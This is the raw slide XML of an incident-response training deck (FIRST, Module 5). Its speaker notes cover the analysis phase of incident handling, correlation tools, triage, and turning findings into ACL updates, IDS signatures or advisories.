                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>2 minutes</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Say: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="352425" lvl="1" indent="-17303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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Although we said at the beginning of this section that this is mostly manual research, that is, not automated, that doesn’t mean you can’t leverage many tools to assist you and minimize analysis time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="352425" lvl="1" indent="-17303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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>If possible, you’ll want to pick tools that are cross-platform or web-based so all members of your team can access the same tools regardless of their platforms. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="352425" lvl="1" indent="-17303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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Although not impossible, in general, GUIs are harder to put into scripts for repetitive tasks. So CLIs are preferable if that version of a tool is available. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="352425" lvl="1" indent="-17303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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>And finally, graph-based visual relationship tools are great. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="352425" lvl="1" indent="-17303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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>One example is displayed on the screen, produced by Maltego. As we discussed earlier, the choice between various open source and commercial tools involves a number of issues including the feature set you need, integration with your other tools and systems, and the cost. You may also want to explore CRITs, Palantir, Malcom, and a number of other tools.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Segue: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>The next element we will discuss in investigation is triage. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32772" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFC60A77-A9C5-E547-96D1-DC92BC5EACC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6532563" y="8928100"/>
            <a:ext cx="325437"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p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{9322D756-3933-7F49-ACDD-8227A0EB5730}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather Sans" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32773" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92DFED70-C2FB-274F-9565-4D4FF0AFE20A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8931275"/>
            <a:ext cx="4954588"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00000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident Response Training Module 5: Research the Analysis Process, version 1.0, © 2017 FIRST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8" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE399C6E-B15C-1642-B91B-D9715655FF25}"/>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826971E3-770B-B641-A5EA-20EC57AF3F86}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69633" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2D3C0E2-09B2-144D-B73A-96DE984BEAA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631825" y="4343400"/>
            <a:ext cx="5592763" cy="6448425"/>
          </a:xfrm>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215900" indent="-214313" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Correlation Is Central to the Investigation Phase: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>2 minutes</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Say: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="352425" lvl="1" indent="-17303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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Although we said at the beginning of this section that this is mostly manual research, that is, not automated, that doesn’t mean you can’t leverage many tools to assist you and minimize analysis time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="352425" lvl="1" indent="-17303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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>If possible, you’ll want to pick tools that are cross-platform or web-based so all members of your team can access the same tools regardless of their platforms. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="352425" lvl="1" indent="-17303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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Although not impossible, in general, GUIs are harder to put into scripts for repetitive tasks. So CLIs are preferable if that version of a tool is available. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="352425" lvl="1" indent="-17303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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>And finally, graph-based visual relationship tools are great. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="352425" lvl="1" indent="-17303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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>One example is displayed on the screen, produced by Maltego. As we discussed earlier, the choice between various open source and commercial tools involves a number of issues including the feature set you need, integration with your other tools and systems, and the cost. You may also want to explore CRITs, Palantir, Malcom, and a number of other tools.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Segue: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>The next element we will discuss in investigation is triage. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34820" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACDBC96C-D451-294F-8A33-46B1B1D8129F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6532563" y="8928100"/>
            <a:ext cx="325437"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p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{96F4571B-2A5F-8C4B-B0E4-9375E9D643C0}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather Sans" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34821" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD1AE268-FB3E-D744-BA8E-7D8A408DE2F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8931275"/>
            <a:ext cx="4954588"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00000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident Response Training Module 5: Research the Analysis Process, version 1.0, © 2017 FIRST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866" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{991BA09A-BC3C-204A-9D4F-8CA7D0583BB3}"/>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24ABA635-E0F1-E44F-9230-EC8BDE5CEB0F}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36867" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{387BDE86-D59C-D94E-8902-63B729BE3EB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631825" y="4343400"/>
            <a:ext cx="5592763" cy="64484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215900" indent="-214313" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Final Step Is Developing New Conclusions: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>1 minute</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Say: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>The ultimate goal of incident investigation is to reach new conclusions you couldn’t have made before you started Analysis. Before you can come up with new conclusions, you performed the previous steps of collecting and reviewing the selected additional information. </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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>You might conclude that you need to update (or request that IT update) the ACL lists, IDS signatures or the software level on your servers or other machines. Or perhaps you conclude that you don’t need a software change, but rather, to inform your recipients of a lingering threat: maybe to not open certain types of email attachments, or to avoid certain web sites. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36868" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54388173-86F5-8641-9A49-93257E93BF08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6532563" y="8928100"/>
            <a:ext cx="325437"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p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{A041A63C-61FB-AD4E-8665-1C9FA633531A}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather Sans" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36869" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19B00F03-3F70-994D-8696-937BC1A03A18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8931275"/>
            <a:ext cx="4954588"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00000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident Response Training Module 5: Research the Analysis Process, version 1.0, © 2017 FIRST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914" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B630B84-06DD-9742-B6A5-9495F107107F}"/>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C2FFAE1E-282B-BC41-9000-5595496A44C9}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38915" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36F025F8-86F4-974F-8410-B6E6C9844E10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357188" y="3219450"/>
            <a:ext cx="6143625" cy="6840538"/>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215900" indent="-214313" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Analysis Stage Has Fundamental Tenets: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" i="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>3 minutes</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Say: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>In the most general terms, the Analysis phase involves taking your existing input information that has already been collected and prepared (whether actionable or not) and augmenting it with other sources of information to reach new conclusions. </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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>One example you will receive all the time is an incoming incident report that is delivered to your computer. The report will typically contain a textual description and logs. You will have to perform analysis to generate a conclusion on whether this affects your constituency and, if so, what to do.</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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>This part of processing actionable information is very difficult to automate and is primarily manual. This is where you add the most value to your organization – using your perceptive observations and non-linear thinking. </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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Often your input data alone coming out of the Preparation stage does not give you enough information to be actionable and you need to enhance it before you can take any action.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="215900" indent="-214313" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="313"/>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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident investigation is a key activity during the Analysis phase.</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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>The picture above illustrates how analysis can lead to actionable results. The network traffic captured by your honeypot is fed into a program that will extract common patterns. Your analysis of these common patterns will allow you to generate new IDS signatures. </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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Another example is combining a number of alerts to determine whether they are independent or part of a targeted campaign. If this is a targeted campaign, you can add new patterns, combine alerts together, or issue an advisory. </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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Ask: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>What other sources could you use to lead to a new conclusion from an alert or a detection indicator?</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Instructor notes: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>You should be able to get a good list from the students. For example, a reputation service would tell you if the domain name was used by malware – intentionally or because of malicious code covertly installed on that machine.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38916" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EB54DE1-2009-FF48-B44B-1294B08FB759}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6532563" y="8928100"/>
            <a:ext cx="325437"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p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{C6FE9357-972A-E040-A122-5428C5503F51}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
